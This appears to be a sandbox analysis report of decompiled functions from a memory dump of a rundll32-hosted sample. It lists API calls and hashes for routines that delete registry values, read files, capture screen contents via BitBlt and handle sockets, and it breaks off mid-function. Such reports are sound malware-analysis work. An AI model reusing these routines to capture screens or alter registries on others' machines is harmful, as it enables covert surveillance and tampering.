                                                            0x04641032
                                                            0x04641034
                                                            0x0464103d
                                                            0x0464103f
                                                             C-Code line addresses: 0x04641045, 0x0464104b, 0x04641057, 0x0464105c, 0x04641060, 0x04641068, 0x0464106d, 0x0464106f, 0x04641075, 0x0464108b, 0x04641091, 0x0464109c, 0x0464109e, 0x0464109f, 0x0464109f, 0x046410a8, 0x046410ac, 0x046410ae, 0x046410b1, 0x046410b3, 0x046410b9, 0x046410ba, 0x046410c0, 0x046410c8, 0x046410cb, 0x046410d0, 0x046410d0, 0x046410d5, 0x00000000, 0x046410dd, 0x046410d5, 0x046410e6

                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0464104E
                                                            • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,00000102,?), ref: 04641083
                                                            • RegDeleteValueW.ADVAPI32(?,00000000), ref: 04641091
                                                            • RegCloseKey.ADVAPI32(?), ref: 0464109F
                                                            • LocalFree.KERNEL32(?,?,?,0000003F), ref: 046410C0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$AllocCloseDeleteFreeOpenValue
                                                            • String ID:
                                                            • API String ID: 3540541088-0
                                                            • Opcode ID: 2b7be8dd9a9b4ae7303256ba06f71f423ba3d8db16cae6052eaa4ace23d6769f
                                                            • Instruction ID: fa2d00fbc5cd798a63cb5bf1aab82bc82ad335cb750611b2bfca52e14a619b91
                                                            • Opcode Fuzzy Hash: 2b7be8dd9a9b4ae7303256ba06f71f423ba3d8db16cae6052eaa4ace23d6769f
                                                            • Instruction Fuzzy Hash: 1F3181B5D00218ABDF10DFA4D948AEEBBB8EF45754F14802AF905A7200EB35AB44CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 62%
                                                            			E04634FB0(intOrPtr __ecx, long _a4) {
                                                            				long _v8;
                                                            				intOrPtr _v12;
                                                            				short _t27;
                                                            				long _t28;
                                                            				signed int _t30;
                                                            				void* _t34;
                                                            				WCHAR* _t37;
                                                            				long _t44;
                                                            				short _t47;
                                                            				signed int _t52;
                                                            				void* _t54;
                                                            				void* _t56;
                                                            				WCHAR* _t58;
                                                            
                                                            				_v8 = 0;
                                                            				_t58 = _a4;
                                                            				_t44 = 0;
                                                            				_t46 = __ecx + 0x18;
                                                            				_v12 = __ecx;
                                                            				if(__ecx + 0x18 != _t58) {
                                                            					_push(0xffffffff);
                                                            					L046335F0(_t46, _t58, 0);
                                                            				}
                                                            				_t27 = _t58[0xa];
                                                            				_t52 = _t58[8];
                                                            				if(_t27 < 8) {
                                                            					_t47 = _t58;
                                                            				} else {
                                                            					_t47 =  *_t58;
                                                            				}
                                                            				if( *((short*)(_t47 + _t52 * 2 - 2)) == 0x5c) {
                                                            					L12:
                                                            					_t28 = 0xb + _t58[8] * 2;
                                                            					_a4 = _t28;
                                                            					_t54 = LocalAlloc(0x40, _t28);
                                                            					 *_t54 = 0x6a;
                                                            					 *((intOrPtr*)(_t54 + 1)) = _v8;
                                                            					 *((intOrPtr*)(_t54 + 5)) = _t44;
                                                            					_t30 = _t58[8];
                                                            					if(_t58[0xa] >= 8) {
                                                            						_t58 =  *_t58;
                                                            					}
                                                            					_t22 = _t54 + 9; // 0x9
                                                            					E0465E060(_t22, _t58, 2 + _t30 * 2);
                                                            					_push(0x3f);
                                                            					_push(_a4);
                                                            					_push(_t54);
                                                            					_t34 = E04631C60( *((intOrPtr*)(_v12 + 4)));
                                                            					LocalFree(_t54);
                                                            					return _t34;
                                                            				} else {
                                                            					if(_t27 < 8) {
                                                            						_t37 = _t58;
                                                            					} else {
                                                            						_t37 =  *_t58;
                                                            					}
                                                            					_t56 = CreateFileW(_t37, 0x80000000, 1, 0, 3, 0x80, 0);
                                                            					if(_t56 != 0xffffffff) {
                                                            						_t44 = GetFileSize(_t56,  &_v8);
                                                            						CloseHandle(_t56);
                                                            						goto L12;
                                                            					} else {
                                                            						return 0;
                                                            					}
                                                            				}
                                                            			}
                                                             C-Code line addresses: 0x04634fb8, 0x04634fc1, 0x04634fc4, 0x04634fc6, 0x04634fc9, 0x04634fcf, 0x04634fd1, 0x04634fd5, 0x04634fd5, 0x04634fda, 0x04634fdd, 0x04634fe3, 0x04634fe9, 0x04634fe5, 0x04634fe5, 0x04634fe5, 0x04634ff1, 0x0463503d, 0x04635040, 0x0463504a, 0x04635053, 0x04635055, 0x0463505b, 0x0463505e, 0x04635065, 0x04635068, 0x0463506a, 0x0463506a, 0x04635074, 0x04635079, 0x04635087, 0x04635089, 0x0463508c, 0x0463508d, 0x04635095, 0x046350a3, 0x04634ff3, 0x04634ff6, 0x04634ffc, 0x04634ff8, 0x04634ff8, 0x04634ff8, 0x04635017, 0x0463501c, 0x04635035, 0x04635037, 0x00000000, 0x0463501e, 0x04635026, 0x04635026, 0x0463501c

                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000007,?,?,?), ref: 04635011
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0463502E
                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 04635037
                                                            • LocalAlloc.KERNEL32(00000040,?,00000007,?,?,?), ref: 0463504D
                                                            • LocalFree.KERNEL32(00000000,00000000,?,0000003F,?,?,?), ref: 04635095
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileLocal$AllocCloseCreateFreeHandleSize
                                                            • String ID:
                                                            • API String ID: 1503672127-0
                                                            • Opcode ID: fc0b4b8250a78ea7e42d5da588d26ae6225233a13de3c4dba402d6b106020959
                                                            • Instruction ID: 9c74e031511cdba8018622137dca057410a60cf4fdc9120ac4f500fcd79db7dd
                                                            • Opcode Fuzzy Hash: fc0b4b8250a78ea7e42d5da588d26ae6225233a13de3c4dba402d6b106020959
                                                            • Instruction Fuzzy Hash: 4331A131600204ABD724DFA8DC84F6AB7F9EB85722F10462DF506D7290EB35BD55CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E046428C0(signed short __ecx, signed int _a4, signed int _a8, signed int _a12) {
                                                            				signed short _v8;
                                                            				void* __esi;
                                                            				signed int _t28;
                                                            				struct tagBITMAPINFO* _t30;
                                                            				signed int _t44;
                                                            				struct tagBITMAPINFO* _t51;
                                                            				signed int _t54;
                                                            				unsigned int _t58;
                                                            				signed int _t59;
                                                            				signed char* _t60;
                                                            				struct HDC__* _t64;
                                                            				signed short _t66;
                                                            				void* _t68;
                                                            				signed int _t69;
                                                            
                                                            				_t53 = __ecx;
                                                            				_push(__ecx);
                                                            				_t66 = _a4;
                                                            				_v8 = __ecx;
                                                            				_t72 = _t66 - 8;
                                                            				if(_t66 > 8) {
                                                            					_t28 = 0;
                                                            					__eflags = 0;
                                                            				} else {
                                                            					_t53 = _t66;
                                                            					_t28 = 1 << _t66;
                                                            				}
                                                            				_a4 = _t28;
                                                            				_push(0x28 + _t28 * 4);
                                                            				_t30 = L04655B55(_t53, _t66, _t72);
                                                            				_t54 = _a8;
                                                            				_t51 = _t30;
                                                            				_t59 = _a12;
                                                            				_t51->bmiHeader = 0x28;
                                                            				_t51->bmiHeader.biWidth = _t54;
                                                            				_t51->bmiHeader.biHeight = _t59;
                                                            				_t51->bmiHeader.biPlanes = 1;
                                                            				_t51->bmiHeader.biBitCount = _t66;
                                                            				_t51->bmiHeader.biCompression = 0;
                                                            				_t51->bmiHeader.biXPelsPerMeter = 0;
                                                            				_t51->bmiHeader.biYPelsPerMeter = 0;
                                                            				_t51->bmiHeader.biClrUsed = 0;
                                                            				_t51->bmiHeader.biClrImportant = 0;
                                                            				_t51->bmiHeader.biSizeImage = ((_t66 & 0x0000ffff) * _t54 + 0x0000001f >> 0x00000003 & 0xfffffffc) * _t59;
                                                            				if(_t66 < 0x10) {
                                                            					_t64 = GetDC(0);
                                                            					_t68 = CreateCompatibleBitmap(_t64, 1, 1);
                                                            					GetDIBits(_t64, _t68, 0, 0, 0, _t51, 0);
                                                            					ReleaseDC(0, _t64);
                                                            					DeleteObject(_t68);
                                                            					if( *((char*)(_v8 + 0xc)) != 0) {
                                                            						_t69 = _a4;
                                                            						if(_t69 > 0) {
                                                            							_t21 =  &(_t51->bmiColors[0]); // 0x29
                                                            							_t60 = _t21;
                                                            							do {
                                                            								_t44 =  *_t60 & 0x000000ff;
                                                            								_t60 =  &(_t60[4]);
                                                            								_t58 = _t44 * 0x259 + ( *(_t60 - 3) & 0x000000ff) * 0x132 + ( *(_t60 - 5) & 0x000000ff) * 0x75 >> 0xa;
                                                            								 *(_t60 - 5) = _t58;
                                                            								 *(_t60 - 4) = _t58;
                                                            								 *(_t60 - 3) = _t58;
                                                            								_t69 = _t69 - 1;
                                                            							} while (_t69 != 0);
                                                            						}
                                                            					}
                                                            				}
                                                            				return _t51;
                                                            			}
                                                             C-Code line addresses: 0x046428c0, 0x046428c3, 0x046428c6, 0x046428c9, 0x046428d2, 0x046428d5, 0x046428df, 0x046428df, 0x046428d7, 0x046428d9, 0x046428db, 0x046428db, 0x046428e1, 0x046428eb, 0x046428ec, 0x046428f1, 0x046428f4, 0x046428f6, 0x04642902, 0x04642908, 0x0464290b, 0x0464290e, 0x04642915, 0x0464291f, 0x04642929, 0x04642930, 0x04642937, 0x0464293e, 0x04642945, 0x0464294b, 0x0464295b, 0x0464296f, 0x04642973, 0x0464297c, 0x04642983, 0x04642990, 0x04642992, 0x04642997, 0x04642999, 0x04642999, 0x046429a0, 0x046429a0, 0x046429a3, 0x046429c1, 0x046429c4, 0x046429c7, 0x046429ca, 0x046429cd, 0x046429cd, 0x046429a0, 0x04642997, 0x04642990, 0x046429da

                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 04642953
                                                            • CreateCompatibleBitmap.GDI32(00000000,00000001,00000001), ref: 04642960
                                                            • GetDIBits.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04642973
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0464297C
                                                            • DeleteObject.GDI32(00000000), ref: 04642983
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: BitmapBitsCompatibleCreateDeleteObjectRelease
                                                            • String ID:
                                                            • API String ID: 3052192651-0
                                                            • Opcode ID: 23e00ef462ece27f86bb72b11ad60dc7fae9889c02e0dba34a0001f9eb055b45
                                                            • Instruction ID: 9b96ecca2699273e9908c59c7bbf5a37b498140f401652f8bb01ca860b3ffd2b
                                                            • Opcode Fuzzy Hash: 23e00ef462ece27f86bb72b11ad60dc7fae9889c02e0dba34a0001f9eb055b45
                                                            • Instruction Fuzzy Hash: B831CA72601210AFEB048F55DC99759FFA4EF55310F158299F805CF2C2E778D944DB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 90%
                                                            			E04642A10(intOrPtr __ecx, int* _a4) {
                                                            				intOrPtr _v8;
                                                            				void* _v12;
                                                            				int _v16;
                                                            				intOrPtr* _t46;
                                                            				intOrPtr _t62;
                                                            				int _t72;
                                                            				intOrPtr _t73;
                                                            				void* _t81;
                                                            				int _t83;
                                                            				intOrPtr _t85;
                                                            
                                                            				_t46 = _a4;
                                                            				_v12 = 0;
                                                            				_t3 = _t46 + 8; // 0x8a0004c2
                                                            				_t4 = _t46 + 0xc; // 0x5e5fff45
                                                            				_t83 =  *_t3 -  *_t46;
                                                            				_t5 = _t46 + 4; // 0x5de58b5b
                                                            				_t72 =  *_t4 -  *_t5;
                                                            				 *(__ecx + 0x64)->bmiHeader.biWidth = _t83;
                                                            				_v8 = __ecx;
                                                            				_v16 = _t83;
                                                            				 *(__ecx + 0x64)->bmiHeader.biHeight = _t72;
                                                            				 *(__ecx + 0x64)->bmiHeader.biSizeImage = (( *(__ecx + 0x64)->bmiHeader.biBitCount & 0x0000ffff) *  *(__ecx + 0x64)->bmiHeader.biWidth + 0x0000001f >> 0x00000003 & 0xfffffffc) *  *(__ecx + 0x64)->bmiHeader.biHeight;
                                                            				_t81 = CreateDIBSection( *(__ecx + 0x3c),  *(__ecx + 0x64), 0,  &_v12, 0, 0);
                                                            				SelectObject( *(_v8 + 0x48), _t81);
                                                            				BitBlt( *(_v8 + 0x44),  *_a4, _a4[1], _t83, _t72,  *(_v8 + 0x3c),  *_a4, _a4[1],  *(_v8 + 0x10));
                                                            				_t62 = _v8;
                                                            				_t73 = _t62;
                                                            				BitBlt( *(_t73 + 0x48), 0, 0, _v16, _t72,  *(_t62 + 0x44),  *_a4, _a4[1], 0xcc0020);
                                                            				asm("movups xmm0, [edx]");
                                                            				asm("movups [eax], xmm0");
                                                            				 *((intOrPtr*)(_t73 + 0x18)) =  *((intOrPtr*)(_t73 + 0x18)) + 0x10;
                                                            				_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x64)) + 0x14));
                                                            				E0465E060( *((intOrPtr*)(_t73 + 0x14)) +  *((intOrPtr*)(_t73 + 0x18)), _v12, _t85);
                                                            				 *((intOrPtr*)(_t73 + 0x18)) =  *((intOrPtr*)(_t73 + 0x18)) + _t85;
                                                            				return DeleteObject(_t81);
                                                            			}
                                                             C-Code line addresses: 0x04642a16, 0x04642a1d, 0x04642a24, 0x04642a27, 0x04642a2a, 0x04642a2c, 0x04642a2c, 0x04642a37, 0x04642a3d, 0x04642a40, 0x04642a43, 0x04642a5e, 0x04642a73, 0x04642a7c, 0x04642aa2, 0x04642ab1, 0x04642abb, 0x04642ac4, 0x04642acf, 0x04642ad2, 0x04642ad8, 0x04642adc, 0x04642aea, 0x04642af2, 0x04642b02

                                                            APIs
                                                            • CreateDIBSection.GDI32(00000000,?,00000000,00000000,00000000,00000000), ref: 04642A6D
                                                            • SelectObject.GDI32(?,00000000), ref: 04642A7C
                                                            • BitBlt.GDI32(?,?,?,8A0004C2,5DE58B5B,?,?,?,?), ref: 04642AA2
                                                            • BitBlt.GDI32(?,00000000,00000000,?,5DE58B5B,?,00000000,?,00CC0020), ref: 04642AC4
                                                            • DeleteObject.GDI32(00000000), ref: 04642AF6
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CreateDeleteSectionSelect
                                                            • String ID:
                                                            • API String ID: 3188413882-0
                                                            • Opcode ID: 4f3238ace2a8b6a2507b7af1489a48db2bdbf1702015211358e620b9378012cb
                                                            • Instruction ID: 466b819fe531e757a0acbbc1c2e413ce1535fd8886b8acbec398e49ac7a3f064
                                                            • Opcode Fuzzy Hash: 4f3238ace2a8b6a2507b7af1489a48db2bdbf1702015211358e620b9378012cb
                                                            • Instruction Fuzzy Hash: 30311676900204EFDB04CF98DD85E9ABBB9FF49310F158195FA049B262D771ED90DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0464D2D0(signed short* __ecx, short* __edx, WCHAR* _a4, signed int* _a8, signed int _a12) {
                                                            				signed int _t14;
                                                            				signed int _t19;
                                                            				WCHAR* _t20;
                                                            				signed int _t31;
                                                            				signed int* _t35;
                                                            				WCHAR* _t38;
                                                            				void* _t39;
                                                            				signed int _t40;
                                                            
                                                            				 *__edx =  *__ecx;
                                                            				_t14 = __ecx[1] & 0x0000ffff;
                                                            				__imp__#15(_t14);
                                                            				_t38 = _a4;
                                                            				 *_a12 = _t14;
                                                            				_t16 =  !=  ? 0x1c : 0x10;
                                                            				__imp__WSAAddressToStringW(__ecx, 0x10, 0, _t38, _a8);
                                                            				_t45 =  !=  ? 0x1c : 0x10;
                                                            				if(( !=  ? 0x1c : 0x10) != 0) {
                                                            					return 0;
                                                            				} else {
                                                            					_t40 =  *__ecx & 0x0000ffff;
                                                            					_a12 = _t40;
                                                            					_t19 = __ecx[1] & 0x0000ffff;
                                                            					__imp__#15(_t19, _t39);
                                                            					_t31 = 0 | _t19 != 0x00000000;
                                                            					if(_t40 == 0x17) {
                                                            						if(_t31 == 0) {
                                                            							_t20 = StrChrW(_t38, 0x25);
                                                            							goto L7;
                                                            						} else {
                                                            							_t20 = StrPBrkW(_t38, L"]%");
                                                            						}
                                                            						goto L8;
                                                            					} else {
                                                            						if(_t31 == 0) {
                                                            							L10:
                                                            							_t35 = _a8;
                                                            						} else {
                                                            							_t20 = StrChrW(_t38, 0x3a);
                                                            							L7:
                                                            							L8:
                                                            							if(_t20 == 0) {
                                                            								goto L10;
                                                            							} else {
                                                            								 *_t20 = 0;
                                                            								_t35 = _a8;
                                                            								 *_t35 = _t20 - _t38 >> 1;
                                                            							}
                                                            						}
                                                            					}
                                                            					if(_a12 != 0x17 || _t31 == 0) {
                                                            						 *_t35 =  *_t35 + 1;
                                                            						return 1;
                                                            					} else {
                                                            						E0465E060(_t38,  &(_t38[1]),  *_t35 +  *_t35);
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses: 0x0464d2da, 0x0464d2dd, 0x0464d2e2, 0x0464d2ee, 0x0464d2f2, 0x0464d305, 0x0464d30a, 0x0464d310, 0x0464d312, 0x0464d3aa, 0x0464d318, 0x0464d319, 0x0464d31e, 0x0464d321, 0x0464d326, 0x0464d331, 0x0464d338, 0x0464d344, 0x0464d357, 0x00000000, 0x0464d346, 0x0464d34c, 0x0464d34c, 0x00000000, 0x0464d33a, 0x0464d33c, 0x0464d371, 0x0464d371, 0x0464d33e, 0x0464d357, 0x0464d356, 0x0464d35d, 0x0464d35f, 0x00000000, 0x0464d361, 0x0464d363, 0x0464d368, 0x0464d36d, 0x0464d36d, 0x0464d35f, 0x0464d33c, 0x0464d379, 0x0464d39a, 0x0464d3a4, 0x0464d37f, 0x0464d389, 0x0464d399, 0x0464d399, 0x0464d379

                                                            APIs
                                                            • htons.WS2_32(?), ref: 0464D2E2
                                                            • WSAAddressToStringW.WS2_32(?,00000010,00000000,?,?), ref: 0464D30A
                                                            • htons.WS2_32(?), ref: 0464D326
                                                            • StrPBrkW.SHLWAPI(?,0467F834,?,00000010,00000000,?,?), ref: 0464D34C
                                                            • StrChrW.SHLWAPI(?,00000025,?,00000010,00000000,?,?), ref: 0464D357
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: htons$AddressString
                                                            • String ID:
                                                            • API String ID: 2368566317-0
                                                            • Opcode ID: 02cb54e8cc30de8b43992d2744d452d501b86e615f6a584909e2c8d74f239e91
                                                            • Instruction ID: db6d4a743d8e11f7a21552d9f00de3d29b4aa559162cf0a478b987f436007582
                                                            • Opcode Fuzzy Hash: 02cb54e8cc30de8b43992d2744d452d501b86e615f6a584909e2c8d74f239e91
                                                            • Instruction Fuzzy Hash: 1721A136700205EBEF155F69DC88A7A73ACEF9A714F04406AF909CA250FBB9EC41D760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04647A90(intOrPtr* __ecx, intOrPtr _a4) {
                                                            				void* _v12;
                                                            				char _v16;
                                                            				intOrPtr _v20;
                                                            				char _v24;
                                                            				void* _t28;
                                                            				void* _t30;
                                                            				struct _SECURITY_ATTRIBUTES* _t33;
                                                            				intOrPtr* _t43;
                                                            				intOrPtr _t44;
                                                            				intOrPtr* _t45;
                                                            				intOrPtr _t46;
                                                            
                                                            				_t46 = _a4;
                                                            				_t45 = __ecx;
                                                            				 *__ecx = 0x467e8b0;
                                                            				 *((intOrPtr*)(__ecx + 4)) = _t46;
                                                            				 *((intOrPtr*)(_t46 + 0x38)) = __ecx;
                                                            				_t28 = CreateEventW(0, 1, 0, 0);
                                                            				_t42 = _t45 + 0x1c;
                                                            				 *(_t45 + 8) = _t28;
                                                            				 *_t45 = 0x467f17c;
                                                            				L04632330(_t45 + 0x1c);
                                                            				 *(_t45 + 0x10) = 0;
                                                            				 *(_t45 + 0x14) = 0;
                                                            				 *(_t45 + 0xe4) = 0;
                                                            				 *((char*)(_t45 + 0xec)) = 1;
                                                            				 *((intOrPtr*)(_t45 + 0xe8)) = 0x3f;
                                                            				 *(_t45 + 0xf0) = 0;
                                                            				 *(_t45 + 0xf4) = 0;
                                                            				_t30 = CreateEventW(0, 0, 0, 0);
                                                            				 *(_t45 + 0x18) = _t30;
                                                            				if(_t30 != 0) {
                                                            					 *(_t45 + 0xc) = 1;
                                                            					_v24 = E04648040;
                                                            					_v20 = _t45;
                                                            					_v16 = 1;
                                                            					_v12 = CreateEventW(0, 0, 0, 0);
                                                            					_t33 = E0465F897(_t42, 0, 0, E04645400,  &_v24, 0, 0);
                                                            					WaitForSingleObject(_v12, 0xffffffff);
                                                            					CloseHandle(_v12);
                                                            					 *(_t45 + 0xe4) = _t33;
                                                            					goto L6;
                                                            				} else {
                                                            					 *(_t45 + 0xc) = _t30;
                                                            					_t15 = _t46 + 0x20; // 0x0
                                                            					_t43 =  *_t15;
                                                            					 *(_t46 + 0x44) = 1;
                                                            					if(_t43 != 0) {
                                                            						L4:
                                                            						 *((intOrPtr*)( *_t43 + 4))();
                                                            						return _t45;
                                                            					} else {
                                                            						_t17 = _t46 + 0x24; // 0x0
                                                            						_t44 =  *_t17;
                                                            						if(_t44 == 0) {
                                                            							L6:
                                                            							return _t45;
                                                            						} else {
                                                            							_t43 = _t44 + 4;
                                                            							goto L4;
                                                            						}
                                                            					}
                                                            				}
                                                            			}

                                                            Instruction addresses: 0x04647a9e, 0x04647aa4, 0x04647aac, 0x04647ab2, 0x04647ab5, 0x04647ab8, 0x04647aba, 0x04647abd, 0x04647ac0, 0x04647ac6, 0x04647ad3, 0x04647ada, 0x04647ae1, 0x04647aeb, 0x04647af2, 0x04647afc, 0x04647b06, 0x04647b10, 0x04647b12, 0x04647b17, 0x04647b4c, 0x04647b53, 0x04647b5a, 0x04647b5d, 0x04647b67, 0x04647b77, 0x04647b86, 0x04647b8f, 0x04647b95, 0x00000000, 0x04647b19, 0x04647b19, 0x04647b1c, 0x04647b1c, 0x04647b1f, 0x04647b28, 0x04647b34, 0x04647b36, 0x04647b41, 0x04647b2a, 0x04647b2a, 0x04647b2a, 0x04647b2f, 0x04647b9b, 0x04647ba3, 0x04647b31, 0x04647b31, 0x00000000, 0x04647b31, 0x04647b2f, 0x04647b28

                                                            APIs
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,04639782,046878D8,046878D8,00000000), ref: 04647AB8
                                                              • Part of subcall function 04632330: CoInitialize.OLE32(00000000), ref: 0463239B
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04639782,046878D8,046878D8,00000000), ref: 04647B10
                                                            • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 04647B61
                                                            • WaitForSingleObject.KERNEL32(046878D8,000000FF), ref: 04647B86
                                                            • CloseHandle.KERNEL32(046878D8), ref: 04647B8F
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateEvent$CloseHandleInitializeObjectSingleWait
                                                            • String ID:
                                                            • API String ID: 3162378676-0
                                                            • Opcode ID: d9e34affa871038aa6799721a483d9f1a92ec6beca9c9fbe1386126487b7abed
                                                            • Instruction ID: 23745ce7b951a87e28018cdeeab809151eb8c1bee1534ee2d2e7a55245673462
                                                            • Opcode Fuzzy Hash: d9e34affa871038aa6799721a483d9f1a92ec6beca9c9fbe1386126487b7abed
                                                            • Instruction Fuzzy Hash: 8631ABB1740706ABE714CF55CC45BAAFBA0FB54715F10421AE619AB6C0E7B2B814CBD4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 19%
                                                            			E0464D490(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				signed int _t12;
                                                            				char* _t22;
                                                            				intOrPtr* _t42;
                                                            				intOrPtr* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t12 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t12 ^ _t44;
                                                            				_v16 = 1;
                                                            				_v12 = 0;
                                                            				_t29 = __ecx;
                                                            				if(__edx != 0) {
                                                            					if(__edx != 1) {
                                                            						if(__edx != 2) {
                                                            							SetLastError(0x57);
                                                            							return E04655AFE(_v8 ^ _t44);
                                                            						} else {
                                                            							_t42 = __imp__#21;
                                                            							 *_t42(__ecx, 0xffff, 0xfffffffb,  &_v12, 4);
                                                            							 *_t42(0xffff, 4,  &_v16, 4);
                                                            							return E04655AFE(_v8 ^ _t44, __ecx);
                                                            						}
                                                            					} else {
                                                            						_t22 =  &_v12;
                                                            						goto L4;
                                                            					}
                                                            				} else {
                                                            					_t22 =  &_v16;
                                                            					L4:
                                                            					_t43 = __imp__#21;
                                                            					 *_t43(_t29, 0xffff, 0xfffffffb, _t22, 4);
                                                            					 *_t43(0xffff, 4,  &_v12, 4);
                                                            					return E04655AFE(_v8 ^ _t44, _t29);
                                                            				}
                                                            			}

                                                            Instruction addresses: 0x0464d496, 0x0464d49d, 0x0464d4a0, 0x0464d4a7, 0x0464d4af, 0x0464d4b5, 0x0464d4bf, 0x0464d4ff, 0x0464d53e, 0x0464d557, 0x0464d501, 0x0464d501, 0x0464d515, 0x0464d527, 0x0464d53b, 0x0464d53b, 0x0464d4c1, 0x0464d4c1, 0x00000000, 0x0464d4c1, 0x0464d4b7, 0x0464d4b7, 0x0464d4c4, 0x0464d4c4, 0x0464d4d5, 0x0464d4e7, 0x0464d4fb, 0x0464d4fb

                                                            APIs
                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 0464D4D5
                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,00000000,00000004), ref: 0464D4E7
                                                            • setsockopt.WS2_32(?,0000FFFF,000000FB,00000000,00000004), ref: 0464D515
                                                            • setsockopt.WS2_32(?,0000FFFF,00000004,00000001,00000004), ref: 0464D527
                                                            • SetLastError.KERNEL32(00000057), ref: 0464D53E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                             • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: setsockopt$ErrorLast
                                                            • String ID:
                                                            • API String ID: 1564866530-0
                                                            • Opcode ID: 4b15b3df0400fbd14b35ba7f40b63bdf0c435a04b7360d86bd7cc0672761fe9d
                                                            • Instruction ID: 0de93a9c8b2b0fdfcbd735d8c1fb016ee218239ecc59b755aa0108bc957fcca7
                                                            • Opcode Fuzzy Hash: 4b15b3df0400fbd14b35ba7f40b63bdf0c435a04b7360d86bd7cc0672761fe9d
                                                            • Instruction Fuzzy Hash: 7A21C676B0420E7AEB10DAA49C81FBE7768DF84735F10027AEB05A62C5EE7569088B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 57%
                                                             			/* Decompiled from the memory dump (quality 57%). The comments are
                                                             			   editorial interpretation of the decompiler output, not recovered
                                                             			   source. _a4/_a8 look like a (payload, length) pair: byte 0 is
                                                             			   skipped, the next four bytes are read as a value that later serves
                                                             			   as the hKey argument of RegOpenKeyExW, and E04640D20 pulls a wide
                                                             			   string (the key path) out of the remainder. */
                                                             			E046411E0(void* __ebx, intOrPtr __ecx, void* _a4, void* _a8) {
                                                             				intOrPtr* _v8;
                                                             				long _v12;
                                                             				intOrPtr _v16;
                                                             				void* _v20;        /* parse-error flag */
                                                             				intOrPtr* _v24;    /* read cursor into the payload */
                                                             				char _v28;         /* end pointer; &_v28 is handed to E04640D20 as an {end, cursor, error} descriptor */
                                                             				char _t29;
